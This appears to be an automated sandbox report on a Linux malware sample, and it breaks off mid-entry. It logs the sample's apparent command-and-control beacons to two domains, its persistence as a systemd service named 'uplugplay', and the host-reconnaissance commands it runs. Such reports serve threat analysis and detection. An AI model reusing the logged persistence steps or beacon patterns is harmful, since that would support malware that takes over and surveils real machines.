Mar 31, 2025 11:40:23.439924955 CEST	281	OUT	GET /cgi-bin/p.cgi?r=0&auth=hash&i=HG6TD1RQ3I303VPA&enckey=vMZ4j7wVt0TOGgrBVyLGT-o3g5lyXY3eCCpCC6HDpiEC3uml3Pa0ufNqEQeTiqnifbJfxaYOEK898GbJVIuU9LBjVNocqNvN90ufapLcGro/YFHeMopRS5SU8wGbDGqBizoJETv6zeP4GW9ieh6cWY26AF88cg7ABgHPeMmGdDM_ HTTP/1.0 Host: xinchaodbcfda.net
Mar 31, 2025 11:40:23.675429106 CEST	398	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Mar 2025 09:40:23 GMT Content-Type: text/html Connection: close Set-Cookie: btst=6ca2ca847287b2e8ed698effe263f292\|45.92.229.165\|1743414023\|1743414023\|0\|1\|0; path=/; domain=.xinchaodbcfda.net; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=45.92.229.165; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.14	44132	85.214.228.140	80

Timestamp	Bytes transferred	Direction	Data
Mar 31, 2025 11:40:24.502275944 CEST	277	OUT	GET /cgi-bin/p.cgi?r=0&auth=hash&i=HG6TD1RQ3I303VPA&enckey=vMZ4j7wVt0TOGgrBVyLGT-o3g5lyXY3eCCpCC6HDpiEC3uml3Pa0ufNqEQeTiqnifbJfxaYOEK898GbJVIuU9LBjVNocqNvN90ufapLcGro/YFHeMopRS5SU8wGbDGqBizoJETv6zeP4GW9ieh6cWY26AF88cg7ABgHPeMmGdDM_ HTTP/1.0 Host: xindbcfda.org
Mar 31, 2025 11:40:24.689996004 CEST	188	IN	HTTP/1.0 404 Not Found Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Mon, 31 Mar 2025 09:40:24 GMT Content-Length: 19 Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found

System Behavior

Analysis Process: na.elf PID: 5454, Parent PID: 5381

General

Start time (UTC):	09:38:03
Start date (UTC):	31/03/2025
Path:	/tmp/na.elf
Arguments:	/tmp/na.elf
File size:	435932 bytes
MD5 hash:	2bc8e60ab00c639da1f3c93f8843e04e

File Activities

File Opened

File Deleted

File Read

File Written

Permission Modified

Process Activities

Process Forked

Thread Sleep

System Activities

Query System Information (uname)

Chronological Activities

Analysis Process: na.elf PID: 5457, Parent PID: 5454

General

Start time (UTC):	09:38:03
Start date (UTC):	31/03/2025
Path:	/tmp/na.elf
Arguments:	-
File size:	435932 bytes
MD5 hash:	2bc8e60ab00c639da1f3c93f8843e04e

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 5457, Parent PID: 5454

General

Start time (UTC):	09:38:03
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "pgrep na.elf"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5458, Parent PID: 5457

General

Start time (UTC):	09:38:03
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: pgrep PID: 5458, Parent PID: 5457

General

Start time (UTC):	09:38:03
Start date (UTC):	31/03/2025
Path:	/usr/bin/pgrep
Arguments:	pgrep na.elf
File size:	30968 bytes
MD5 hash:	fa96a75a08109d8842e4865b2907d51f

File Activities

File Opened

File Read

Directory Enumerated

Chronological Activities

Analysis Process: na.elf PID: 5463, Parent PID: 5454

General

Start time (UTC):	09:38:05
Start date (UTC):	31/03/2025
Path:	/tmp/na.elf
Arguments:	-
File size:	435932 bytes
MD5 hash:	2bc8e60ab00c639da1f3c93f8843e04e

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 5463, Parent PID: 5454

General

Start time (UTC):	09:38:05
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "pidof na.elf"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5464, Parent PID: 5463

General

Start time (UTC):	09:38:05
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: pidof PID: 5464, Parent PID: 5463

General

Start time (UTC):	09:38:05
Start date (UTC):	31/03/2025
Path:	/usr/bin/pidof
Arguments:	pidof na.elf
File size:	27016 bytes
MD5 hash:	f58f67968fc50f1497f9ea9e9c22b6e8

File Activities

File Opened

File Read

Directory Enumerated

Chronological Activities

Analysis Process: na.elf PID: 5467, Parent PID: 5454

General

Start time (UTC):	09:38:06
Start date (UTC):	31/03/2025
Path:	/tmp/na.elf
Arguments:	-
File size:	435932 bytes
MD5 hash:	2bc8e60ab00c639da1f3c93f8843e04e

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 5467, Parent PID: 5454

General

Start time (UTC):	09:38:06
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "pgrep uplugplay"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5468, Parent PID: 5467

General

Start time (UTC):	09:38:07
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: pgrep PID: 5468, Parent PID: 5467

General

Start time (UTC):	09:38:07
Start date (UTC):	31/03/2025
Path:	/usr/bin/pgrep
Arguments:	pgrep uplugplay
File size:	30968 bytes
MD5 hash:	fa96a75a08109d8842e4865b2907d51f

File Activities

File Opened

File Read

Directory Enumerated

Chronological Activities

Analysis Process: na.elf PID: 5471, Parent PID: 5454

General

Start time (UTC):	09:38:08
Start date (UTC):	31/03/2025
Path:	/tmp/na.elf
Arguments:	-
File size:	435932 bytes
MD5 hash:	2bc8e60ab00c639da1f3c93f8843e04e

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 5471, Parent PID: 5454

General

Start time (UTC):	09:38:08
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "pgrep upnpsetup"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5472, Parent PID: 5471

General

Start time (UTC):	09:38:08
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: pgrep PID: 5472, Parent PID: 5471

General

Start time (UTC):	09:38:08
Start date (UTC):	31/03/2025
Path:	/usr/bin/pgrep
Arguments:	pgrep upnpsetup
File size:	30968 bytes
MD5 hash:	fa96a75a08109d8842e4865b2907d51f

File Activities

File Opened

File Read

Directory Enumerated

Chronological Activities

Analysis Process: na.elf PID: 5477, Parent PID: 5454

General

Start time (UTC):	09:38:10
Start date (UTC):	31/03/2025
Path:	/tmp/na.elf
Arguments:	-
File size:	435932 bytes
MD5 hash:	2bc8e60ab00c639da1f3c93f8843e04e

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 5477, Parent PID: 5454

General

Start time (UTC):	09:38:10
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "pidof upnpsetup"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5489, Parent PID: 5477

General

Start time (UTC):	09:38:10
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: pidof PID: 5489, Parent PID: 5477

General

Start time (UTC):	09:38:10
Start date (UTC):	31/03/2025
Path:	/usr/bin/pidof
Arguments:	pidof upnpsetup
File size:	27016 bytes
MD5 hash:	f58f67968fc50f1497f9ea9e9c22b6e8

File Activities

File Opened

File Read

Directory Enumerated

Chronological Activities

Analysis Process: na.elf PID: 5504, Parent PID: 5454

General

Start time (UTC):	09:38:13
Start date (UTC):	31/03/2025
Path:	/tmp/na.elf
Arguments:	-
File size:	435932 bytes
MD5 hash:	2bc8e60ab00c639da1f3c93f8843e04e

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 5504, Parent PID: 5454

General

Start time (UTC):	09:38:13
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "systemctl daemon-reload"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5505, Parent PID: 5504

General

Start time (UTC):	09:38:13
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: systemctl PID: 5505, Parent PID: 5504

General

Start time (UTC):	09:38:13
Start date (UTC):	31/03/2025
Path:	/usr/bin/systemctl
Arguments:	systemctl daemon-reload
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

File Activities

File Opened

File Read

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: na.elf PID: 5513, Parent PID: 5454

General

Start time (UTC):	09:38:14
Start date (UTC):	31/03/2025
Path:	/tmp/na.elf
Arguments:	-
File size:	435932 bytes
MD5 hash:	2bc8e60ab00c639da1f3c93f8843e04e

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 5513, Parent PID: 5454

General

Start time (UTC):	09:38:14
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "systemctl enable uplugplay.service"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5514, Parent PID: 5513

General

Start time (UTC):	09:38:14
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: systemctl PID: 5514, Parent PID: 5513

General

Start time (UTC):	09:38:14
Start date (UTC):	31/03/2025
Path:	/usr/bin/systemctl
Arguments:	systemctl enable uplugplay.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

File Activities

File Opened

File Read

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: na.elf PID: 5519, Parent PID: 5454

General

Start time (UTC):	09:38:15
Start date (UTC):	31/03/2025
Path:	/tmp/na.elf
Arguments:	-
File size:	435932 bytes
MD5 hash:	2bc8e60ab00c639da1f3c93f8843e04e

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 5519, Parent PID: 5454

General

Start time (UTC):	09:38:15
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "systemctl start uplugplay.service"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5520, Parent PID: 5519

General

Start time (UTC):	09:38:15
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: systemctl PID: 5520, Parent PID: 5519

General

Start time (UTC):	09:38:15
Start date (UTC):	31/03/2025
Path:	/usr/bin/systemctl
Arguments:	systemctl start uplugplay.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

File Activities

File Opened

File Read

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: fwupd PID: 5481, Parent PID: 1

General

Start time (UTC):	09:38:10
Start date (UTC):	31/03/2025
Path:	/usr/libexec/fwupd/fwupd
Arguments:	-
File size:	260616 bytes
MD5 hash:	9baeed1d7c56e92aea5277bdf8b4373f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: gpgconf PID: 5481, Parent PID: 1

General

Start time (UTC):	09:38:10
Start date (UTC):	31/03/2025
Path:	/usr/bin/gpgconf
Arguments:	/usr/bin/gpgconf --list-dirs
File size:	178848 bytes
MD5 hash:	ddc6865fed36b9020dfd6fe9d360ebbb

File Activities

File Opened

File Read

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: fwupd PID: 5491, Parent PID: 1

General

Start time (UTC):	09:38:10
Start date (UTC):	31/03/2025
Path:	/usr/libexec/fwupd/fwupd
Arguments:	-
File size:	260616 bytes
MD5 hash:	9baeed1d7c56e92aea5277bdf8b4373f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: gpgconf PID: 5491, Parent PID: 1

General

Start time (UTC):	09:38:10
Start date (UTC):	31/03/2025
Path:	/usr/bin/gpgconf
Arguments:	/usr/bin/gpgconf --list-components
File size:	178848 bytes
MD5 hash:	ddc6865fed36b9020dfd6fe9d360ebbb

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: fwupd PID: 5493, Parent PID: 1

General

Start time (UTC):	09:38:11
Start date (UTC):	31/03/2025
Path:	/usr/libexec/fwupd/fwupd
Arguments:	-
File size:	260616 bytes
MD5 hash:	9baeed1d7c56e92aea5277bdf8b4373f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: gpg PID: 5493, Parent PID: 1

General

Start time (UTC):	09:38:11
Start date (UTC):	31/03/2025
Path:	/usr/bin/gpg
Arguments:	/usr/bin/gpg --version
File size:	1066992 bytes
MD5 hash:	3c2e7402cc788b3a878a1d2bea56afbf

File Activities

File Opened

File Read

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: fwupd PID: 5495, Parent PID: 1

General

Start time (UTC):	09:38:11
Start date (UTC):	31/03/2025
Path:	/usr/libexec/fwupd/fwupd
Arguments:	-
File size:	260616 bytes
MD5 hash:	9baeed1d7c56e92aea5277bdf8b4373f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: gpgsm PID: 5495, Parent PID: 1

General

Start time (UTC):	09:38:11
Start date (UTC):	31/03/2025
Path:	/usr/bin/gpgsm
Arguments:	/usr/bin/gpgsm --version
File size:	519416 bytes
MD5 hash:	66be603a7085efc7ee3140d2ff597485

File Activities

File Opened

File Read

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: fwupd PID: 5497, Parent PID: 1

General

Start time (UTC):	09:38:12
Start date (UTC):	31/03/2025
Path:	/usr/libexec/fwupd/fwupd
Arguments:	-
File size:	260616 bytes
MD5 hash:	9baeed1d7c56e92aea5277bdf8b4373f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: gpgconf PID: 5497, Parent PID: 1

General

Start time (UTC):	09:38:12
Start date (UTC):	31/03/2025
Path:	/usr/bin/gpgconf
Arguments:	/usr/bin/gpgconf --version
File size:	178848 bytes
MD5 hash:	ddc6865fed36b9020dfd6fe9d360ebbb

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: fwupd PID: 5499, Parent PID: 1

General

Start time (UTC):	09:38:12
Start date (UTC):	31/03/2025
Path:	/usr/libexec/fwupd/fwupd
Arguments:	-
File size:	260616 bytes
MD5 hash:	9baeed1d7c56e92aea5277bdf8b4373f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: gpg PID: 5499, Parent PID: 1

General

Start time (UTC):	09:38:12
Start date (UTC):	31/03/2025
Path:	/usr/bin/gpg
Arguments:	/usr/bin/gpg --version
File size:	1066992 bytes
MD5 hash:	3c2e7402cc788b3a878a1d2bea56afbf

File Activities

File Opened

File Read

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: fwupd PID: 5501, Parent PID: 1

General

Start time (UTC):	09:38:12
Start date (UTC):	31/03/2025
Path:	/usr/libexec/fwupd/fwupd
Arguments:	-
File size:	260616 bytes
MD5 hash:	9baeed1d7c56e92aea5277bdf8b4373f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: gpg PID: 5501, Parent PID: 1

General

Start time (UTC):	09:38:12
Start date (UTC):	31/03/2025
Path:	/usr/bin/gpg
Arguments:	gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27
File size:	1066992 bytes
MD5 hash:	3c2e7402cc788b3a878a1d2bea56afbf

File Activities

File Opened

File Deleted

File Read

File Written

Link Created

System Activities

Query System Information (uname)

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: fwupd PID: 5503, Parent PID: 1

General

Start time (UTC):	09:38:13
Start date (UTC):	31/03/2025
Path:	/usr/libexec/fwupd/fwupd
Arguments:	-
File size:	260616 bytes
MD5 hash:	9baeed1d7c56e92aea5277bdf8b4373f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: gpg PID: 5503, Parent PID: 1

General

Start time (UTC):	09:38:13
Start date (UTC):	31/03/2025
Path:	/usr/bin/gpg
Arguments:	gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 24 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 26 --import -- -&27
File size:	1066992 bytes
MD5 hash:	3c2e7402cc788b3a878a1d2bea56afbf

File Activities

File Opened

File Deleted

File Read

File Written

Link Created

System Activities

Query System Information (uname)

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: fwupd PID: 5509, Parent PID: 1

General

Start time (UTC):	09:38:14
Start date (UTC):	31/03/2025
Path:	/usr/libexec/fwupd/fwupd
Arguments:	-
File size:	260616 bytes
MD5 hash:	9baeed1d7c56e92aea5277bdf8b4373f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: gpg PID: 5509, Parent PID: 1

General

Start time (UTC):	09:38:14
Start date (UTC):	31/03/2025
Path:	/usr/bin/gpg
Arguments:	gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28
File size:	1066992 bytes
MD5 hash:	3c2e7402cc788b3a878a1d2bea56afbf

File Activities

File Opened

File Deleted

File Read

File Written

Link Created

System Activities

Query System Information (uname)

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: systemd PID: 5511, Parent PID: 5510

General

Start time (UTC):	09:38:14
Start date (UTC):	31/03/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: snapd-env-generator PID: 5511, Parent PID: 5510

General

Start time (UTC):	09:38:14
Start date (UTC):	31/03/2025
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

File Activities

File Opened

File Read

File Written

Chronological Activities

Analysis Process: systemd PID: 5517, Parent PID: 5516

General

Start time (UTC):	09:38:15
Start date (UTC):	31/03/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: snapd-env-generator PID: 5517, Parent PID: 5516

General

Start time (UTC):	09:38:15
Start date (UTC):	31/03/2025
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

File Activities

File Opened

File Read

File Written

Chronological Activities

Analysis Process: fwupd PID: 5522, Parent PID: 1

General

Start time (UTC):	09:38:15
Start date (UTC):	31/03/2025
Path:	/usr/libexec/fwupd/fwupd
Arguments:	-
File size:	260616 bytes
MD5 hash:	9baeed1d7c56e92aea5277bdf8b4373f

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: gpg PID: 5522, Parent PID: 1

General

Start time (UTC):	09:38:15
Start date (UTC):	31/03/2025
Path:	/usr/bin/gpg
Arguments:	gpg --enable-special-filenames --batch --no-sk-comments --homedir /var/lib/fwupd/gnupg --status-fd 23 --no-tty --charset utf8 --enable-progress-filter --exit-on-status-write-error --logger-fd 25 --verify -- -&26 -&28
File size:	1066992 bytes
MD5 hash:	3c2e7402cc788b3a878a1d2bea56afbf

File Activities

File Opened

File Deleted

File Read

File Written

Link Created

System Activities

Query System Information (uname)

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: systemd PID: 5523, Parent PID: 1

General

Start time (UTC):	09:38:16
Start date (UTC):	31/03/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: uplugplay PID: 5523, Parent PID: 1

General

Start time (UTC):	09:38:16
Start date (UTC):	31/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	/usr/sbin/uplugplay
File size:	435932 bytes
MD5 hash:	2bc8e60ab00c639da1f3c93f8843e04e

File Activities

File Opened

Process Activities

Process Forked

Thread Sleep

System Activities

Query System Information (uname)

Chronological Activities

Analysis Process: uplugplay PID: 5533, Parent PID: 5523

General

Start time (UTC):	09:38:16
Start date (UTC):	31/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	2bc8e60ab00c639da1f3c93f8843e04e

File Activities

File Opened

Process Activities

Process Forked

Chronological Activities

Analysis Process: uplugplay PID: 5534, Parent PID: 5533

General

Start time (UTC):	09:38:16
Start date (UTC):	31/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	2bc8e60ab00c639da1f3c93f8843e04e

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 5534, Parent PID: 5533

General

Start time (UTC):	09:38:16
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "/usr/sbin/uplugplay -Dcomsvc"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5535, Parent PID: 5534

General

Start time (UTC):	09:38:16
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: uplugplay PID: 5535, Parent PID: 5534

General

Start time (UTC):	09:38:16
Start date (UTC):	31/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	/usr/sbin/uplugplay -Dcomsvc
File size:	435932 bytes
MD5 hash:	2bc8e60ab00c639da1f3c93f8843e04e

File Activities

File Opened

File Read

File Written

Process Activities

Process Forked

Thread Sleep

System Activities

Query System Information (uname)

Network Activities

Socket Listening

Socket Connecting

Chronological Activities

Analysis Process: uplugplay PID: 5539, Parent PID: 5535

General

Start time (UTC):	09:38:17
Start date (UTC):	31/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	2bc8e60ab00c639da1f3c93f8843e04e

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 5539, Parent PID: 5535

General

Start time (UTC):	09:38:17
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c hostnamectl
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5540, Parent PID: 5539

General

Start time (UTC):	09:38:17
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: hostnamectl PID: 5540, Parent PID: 5539

General

Start time (UTC):	09:38:17
Start date (UTC):	31/03/2025
Path:	/usr/bin/hostnamectl
Arguments:	hostnamectl
File size:	26848 bytes
MD5 hash:	b1245aa6d3c28b5d5fedb2d681d32eb9

File Activities

File Opened

File Read

Process Activities

Prctl Requested

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: uplugplay PID: 5553, Parent PID: 5535

General

Start time (UTC):	09:38:18
Start date (UTC):	31/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	2bc8e60ab00c639da1f3c93f8843e04e

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 5553, Parent PID: 5535

General

Start time (UTC):	09:38:18
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c hostnamectl
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5554, Parent PID: 5553

General

Start time (UTC):	09:38:18
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: hostnamectl PID: 5554, Parent PID: 5553

General

Start time (UTC):	09:38:18
Start date (UTC):	31/03/2025
Path:	/usr/bin/hostnamectl
Arguments:	hostnamectl
File size:	26848 bytes
MD5 hash:	b1245aa6d3c28b5d5fedb2d681d32eb9

File Activities

File Opened

File Read

Process Activities

Prctl Requested

Network Activities

Socket Connecting

Chronological Activities

Analysis Process: uplugplay PID: 5690, Parent PID: 5535

General

Start time (UTC):	09:38:20
Start date (UTC):	31/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	2bc8e60ab00c639da1f3c93f8843e04e

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 5690, Parent PID: 5535

General

Start time (UTC):	09:38:20
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c uptime
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5694, Parent PID: 5690

General

Start time (UTC):	09:38:20
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: uptime PID: 5694, Parent PID: 5690

General

Start time (UTC):	09:38:20
Start date (UTC):	31/03/2025
Path:	/usr/bin/uptime
Arguments:	uptime
File size:	14568 bytes
MD5 hash:	3ad70d8e33316ac713bf25c2ddf2fb14

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: uplugplay PID: 5693, Parent PID: 5535

General

Start time (UTC):	09:38:20
Start date (UTC):	31/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	2bc8e60ab00c639da1f3c93f8843e04e

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 5693, Parent PID: 5535

General

Start time (UTC):	09:38:20
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c uptime
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5695, Parent PID: 5693

General

Start time (UTC):	09:38:20
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: uptime PID: 5695, Parent PID: 5693

General

Start time (UTC):	09:38:20
Start date (UTC):	31/03/2025
Path:	/usr/bin/uptime
Arguments:	uptime
File size:	14568 bytes
MD5 hash:	3ad70d8e33316ac713bf25c2ddf2fb14

File Activities

File Opened

File Read

Chronological Activities

Analysis Process: uplugplay PID: 5698, Parent PID: 5535

General

Start time (UTC):	09:38:20
Start date (UTC):	31/03/2025
Path:	/usr/sbin/uplugplay
Arguments:	-
File size:	435932 bytes
MD5 hash:	2bc8e60ab00c639da1f3c93f8843e04e

Process Activities

Process Overlayed (Exec)

Chronological Activities

Analysis Process: sh PID: 5698, Parent PID: 5535

General

Start time (UTC):	09:38:20
Start date (UTC):	31/03/2025
Path:	/bin/sh
Arguments:	sh -c "uname -a"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

File Activities

File Opened

File Read

Process Activities

Process Forked

Chronological Activities

Analysis Process: sh PID: 5699, Parent PID: 5698

General

